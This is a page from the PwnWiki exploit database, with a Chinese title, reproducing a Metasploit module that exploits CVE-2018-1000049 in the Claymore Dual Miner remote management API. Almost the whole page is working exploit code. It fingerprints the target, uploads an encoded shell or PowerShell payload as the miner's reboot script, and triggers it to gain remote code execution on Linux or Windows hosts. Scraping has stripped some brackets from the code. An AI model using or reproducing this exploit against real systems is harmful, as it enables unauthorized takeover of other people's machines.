Loading
0

CVE-2018-1000049 Nanopool Claymore Dual Miner APIs 远程代码执行漏洞

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库

,

EXP

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/powershell'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Nanopool Claymore Dual Miner APIs RCE',
      'Description'     => %q{
        This module takes advantage of miner remote manager APIs to exploit an RCE vulnerability.
      },
      'Author'          =>
        
          'email protected', # Vulnerability reporter
          'email protected'          # Metasploit module
        ,
      'License'         => MSF_LICENSE,
      'References'      =>
        
          'EDB', '44638',
          'CVE', '2018-1000049',
          'URL', 'https://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution/'
        ,
      'Platform'        => 'win', 'linux',
      'Targets'         =>
        
           'Automatic Target', { 'auto' => true },
           'Linux',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X64,
              'CmdStagerFlavor' =>  'bourne', 'echo', 'printf' 
            }
          ,
           'Windows',
            {
              'Platform' => 'windows',
              'Arch' => ARCH_X64,
              'CmdStagerFlavor' =>  'certutil', 'vbs' 
            }
          
        ,
      'Payload' =>
        {
          'BadChars' => "\x00"
        },
      'DisclosureDate'  => 'Feb 09 2018',
      'DefaultTarget'   => 0))

    register_options(
      
        OptPort.new('RPORT',  true, 'Set miner port', 3333 )
      )
    deregister_options('URIPATH', 'SSL', 'SSLCert', 'SRVPORT', 'SRVHOST')
  end

  def select_target
    data = {
      "id"      => 0,
      "jsonrpc" => '2.0',
      "method"  => 'miner_getfile',
      "params"  => 'config.txt'
    }.to_json
    connect
    sock.put(data)
    buf = sock.get_once || ''
    tmp = StringIO.new
    tmp << buf
    tmp2 = tmp.string
    hex = ''
    if tmp2.scan(/\w+/)7
      return self.targets2
    elsif tmp2.scan(/\w+/)5
      return self.targets1
    else
      return nil
    end
  end

  def check
    target = select_target
    if target.nil?
      return Exploit::CheckCode::Safe
    end
    data = {
      "id"      => 0,
      "jsonrpc" => '2.0',
      "method"  => 'miner_getfile',
      "params"  => 'config.txt'
    }.to_json
    connect
    sock.put(data)
    buf = sock.get_once || ''
    tmp = StringIO.new
    tmp << buf
    tmp2 = tmp.string
    hex = ''
    case target'Platform'
    when 'linux'
      hex = tmp2.scan(/\w+/)5
    when 'windows'
      hex = tmp2.scan(/\w+/)7
    end
    str = Rex::Text.hex_to_raw(hex)
    if str.include?('WARNING')
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Detected
    end
  rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
    vprint_error(e.message)
    return Exploit::CheckCode::Unknown
  ensure
    disconnect
  end

  def execute_command(cmd, opts = {})
    target = select_target
    case target'Platform'
    when 'linux'
      cmd = Rex::Text.to_hex(cmd, '')
      upload = {
        "id"      => 0,
        "jsonrpc" => '2.0',
        "method"  => 'miner_file',
        "params"  => 'reboot.bash', "#{cmd}"
      }.to_json
    when 'windows'
      cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first), '')
      upload = {
        "id"      => 0,
        "jsonrpc" => '2.0',
        "method"  => 'miner_file',
        "params"  => 'reboot.bat', "#{cmd}"
      }.to_json
    end

    connect
    sock.put(upload)
    buf = sock.get_once || ''
    trigger_vulnerability
  rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
    fail_with(Failure::UnexpectedReply, e.message)
  ensure
    disconnect
  end

  def trigger_vulnerability
    execute = {
      "id"      => 0,
      "jsonrpc" => '2.0',
      "method"  => 'miner_reboot'
    }.to_json
    connect
    sock.put(execute)
    buf = sock.get_once || ''
    disconnect
  end

  def exploit
    target = select_target
    if target.nil?
      fail_with(Failure::NoTarget, 'No matching target')
    end
    if (target'Platform'.eql?('linux') && payload_instance.name !~ /linux/i) ||
      (target'Platform'.eql?('windows') && payload_instance.name !~ /windows/i)
      fail_with(Failure::BadConfig, "Selected payload '#{payload_instance.name}' is not compatible with target operating system '#{target.name}'")
    end
    case target'Platform'
    when 'linux'
      execute_cmdstager(flavor: :echo, linemax: 100000)
    when 'windows'
      execute_cmdstager(flavor: :vbs, linemax: 100000)
    end
  end
end

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库